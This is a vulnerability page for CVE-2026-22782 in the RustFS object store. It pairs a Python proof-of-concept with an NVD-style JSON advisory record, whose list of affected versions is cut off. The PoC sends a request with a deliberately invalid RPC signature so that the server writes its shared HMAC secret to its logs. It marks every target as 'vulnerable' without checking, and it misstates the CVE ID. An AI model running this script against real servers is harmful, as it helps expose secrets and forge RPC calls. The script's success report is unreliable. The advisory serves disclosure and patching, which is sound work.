CVE-2026-22782

#!/usr/bin/env python3 """ CVE-2026-2026-22782 PoC - RustFS HMAC Secret Log Disclosure This PoC demonstrates how an attacker can trigger the logging of HMAC secrets by sending an RPC request with an invalid signature. Note: This is for educational and security testing purposes only. """ import requests import hashlib import hmac import json from urllib.parse import urljoin def generate_invalid_signature(message, secret): """Generate an invalid signature (wrong format) to trigger the vulnerability""" # Using a simple hash instead of proper HMAC to create an invalid signature return hashlib.sha256(message.encode()).hexdigest() def exploit_rustfs_hmac_disclosure(target_url, rpc_endpoint="/rpc"): """ Exploit CVE-2026-2026-22782 by sending a request with invalid signature to trigger HMAC secret logging. Args: target_url: Base URL of the RustFS server rpc_endpoint: RPC endpoint path Returns: dict: Exploitation result """ full_url = urljoin(target_url, rpc_endpoint) # Craft a request with invalid signature to trigger the vulnerable code path payload = { "method": "storage.list", "params": {}, "id": 1 } headers = { "Content-Type": "application/json", "X-Signature": generate_invalid_signature(json.dumps(payload), "dummy") } try: response = requests.post(full_url, json=payload, headers=headers, timeout=10) return { "status": "success", "target": target_url, "http_status": response.status_code, "vulnerable": True, "note": "Request sent with invalid signature. Check server logs for leaked HMAC secrets.", "remediation": "Upgrade to RustFS 1.0.0-alpha.80 or later" } except requests.exceptions.RequestException as e: return { "status": "error", "message": str(e) } if __name__ == "__main__": # Example usage target = "http://target-rustfs-server:8080" result = exploit_rustfs_hmac_disclosure(target) print(json.dumps(result, indent=2))

{"cve": {"id": "CVE-2026-22782", "sourceIdentifier": "[email protected]", "published": "2026-01-16T17:15:54.343", "lastModified": "2026-02-09T20:47:26.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustFS is a distributed object storage system built in Rust. From >= 1.0.0-alpha.1 to 1.0.0-alpha.79, invalid RPC signatures cause the server to log the shared HMAC secret (and expected signature), which exposes the secret to log readers and enables forged RPC calls. In crates/ecstore/src/rpc/http_auth.rs, the invalid signature branch logs sensitive data. This log line includes secret and expected_signature, both derived from the shared HMAC key. Any invalidly signed request triggers this path. The function is reachable from RPC and admin request handlers. This vulnerability is fixed in 1.0.0-alpha.80."}, {"lang": "es", "value": "RustFS es un sistema de almacenamiento de objetos distribuido construido en Rust. Desde >= 1.0.0-alpha.1 hasta 1.0.0-alpha.79, las firmas RPC inválidas hacen que el servidor registre el secreto HMAC compartido (y la firma esperada), lo que expone el secreto a los lectores de registros y permite llamadas RPC falsificadas. En crates/ecstore/src/rpc/http_auth.rs, la rama de firma inválida registra datos sensibles. Esta línea de registro incluye secret y expected_signature, ambos derivados de la clave HMAC compartida. Cualquier solicitud firmada inválidamente activa esta ruta. La función es accesible desde los manejadores de solicitudes RPC y de administración. Esta vulnerabilidad está corregida en 1.0.0-alpha.80."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.9, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-532"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha1:*:*:*:rust:*:*", "matchCriteriaId": "454A2F3A-76CF-4F2D-97FE-AEDEBE8FF1CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha10:*:*:*:rust:*:*", "matchCriteriaId": "32B2D146-7920-4C6D-B42F-1BDDF5193394"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha11:*:*:*:rust:*:*", "matchCriteriaId": "B25BC365-35BA-438A-B5B1-3FA696767821"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha12:*:*:*:rust:*:*", "matchCriteriaId": "B69213F1-7D94-4185-9309-FF3140733550"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha13:*:*:*:rust:*:*", "matchCriteriaId": "BD2476D6-257C-4A96-BED4-D8B002402242"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha14:*:*:*:rust:*:*", "matchCriteriaId": "774EC64C-73ED-4D6B-893B-30A066DA934C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha15:*:*:*:rust:*:*", "matchCriteriaId": "4B567F4F-131F-4D4B-8C0C-9212F22F2BB3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustfs:rustfs:1.0.0:alpha16:*:*:*:r ... (truncated)